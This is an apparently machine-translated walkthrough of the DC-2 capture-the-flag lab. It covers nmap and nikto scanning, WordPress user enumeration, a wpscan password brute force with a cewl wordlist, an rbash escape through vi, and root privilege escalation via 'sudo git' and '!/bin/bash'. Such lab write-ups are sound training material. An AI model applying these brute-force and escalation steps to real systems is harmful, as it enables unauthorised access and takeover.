Infiltrate ideas ：

nmap scanning ----nikto scanning ----wpscan enumeration wordpress user ----cewl Crawl for words ----wpscan Blast wordpress password ----tom user ssh Log in and vi Bypass rbash----su Switch to jerry----sudo git Raise the right

environmental information ：

Drone aircraft ：192.168.101.75

attack ：192.168.101.34

Specific steps ：

1、nmap scanning

sudo nmap -sV -sC -p- 192.168.101.75

Scan to 80(http) and 7744(ssh)

2、nikto Scan website , modify hosts file

​nikto -host http://192.168.101.75

nikto Scan the website and find that the root directory of the website is redirected to http://dc-2/, combination nmap Tips written in the page title in the scanning results “http-title: Did not follow redirect to http://dc-2/”, First in the attack plane hosts Add target aircraft to the document ip and dc-2 Correspondence of .

Because the attacker is kali, Therefore, what needs to be modified is /etc/hosts

sudo vim /etc/hosts

Add the highlighted one , Then save and exit

Then the browser accesses http://dc-2/, In the bright Flag The page was found bright Flag1, The content is about to log into the website and find the next flag, But the usual password dictionary is invalid , Need to use cewl Generate a password dictionary

3、wpscan Enumerate site users

To log in to a website, you must first know which users there are , Because the target website is wordpress, So it can be used wpscan Enumerate

​wpscan --url http://dc-2/ -e

Found three users ：admin、jerry、tom

Save these three user names in a file user.txt in , A line of one , spare

4、cewl Crawl for words ,wpscan Burst code

use cewl Crawl the words contained in the website , And save to file dc2.txt in

​cewl http://dc-2/ -w dc2.txt

And then use wpscan Blast website user name and password , The user name dictionary uses the... In the previous step user.txt, For password dictionary dc2.txt

​wpscan --url http://dc-2/ -U user.txt -P dc2.txt

Get two results

| Username: jerry, Password: adipiscing

| Username: tom, Password: parturient

5、jerry Sign in wordpress Find out flag2

Browser access http://dc-2/wp-admin/, Go to the login page , User name jerry, password adipiscing Log in

stay Pages Page hits Flag2

Find the second flag, This flag Prompt to try another entry point

6、tom user ssh Sign in ,vi Bypass rbash

ssh Only tom Can log in successfully ,jerry Unable to login successfully

ssh [email protected] -p 7744

The password is the step 4 From the explosion parturient

After successful login, I found ,tom In order to rbash Logon , Many commands do not support

adopt vi Bypass rbash：

Drone aircraft shell Input vi

And then in vi Enter... On the interface of

:set shell=/bin/bash
:shell

Then press enter , You can bypass rbash, obtain bash

But for this target plane , There are still many commands that cannot be executed , This is due to the target's environment variables $PATH=/home/tom/usr/bin, There are only a few commands in this directory

therefore , It needs to be revised $PATH A variable's value

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

First, you can use cat Command view flag3.txt 了 ,flag3 You can use su Command switch to jerry user

7、sudo git Raise the right

Switch to jerry, Input

su - jerry

And then enter the steps 4 in wpscan Blasted jerry Password adipiscing

/home/jerry Find below flag4.txt

sudo -l

Find out jerry We can use root execute git command , The command can sudo Raise the right

git | GTFOBins

First, enter... On the target command line

sudo git -p help config

And then in the beginning help Input... In the interface

!/bin/bash

You can get root Of shell

stay /root In the directory final-flag.txt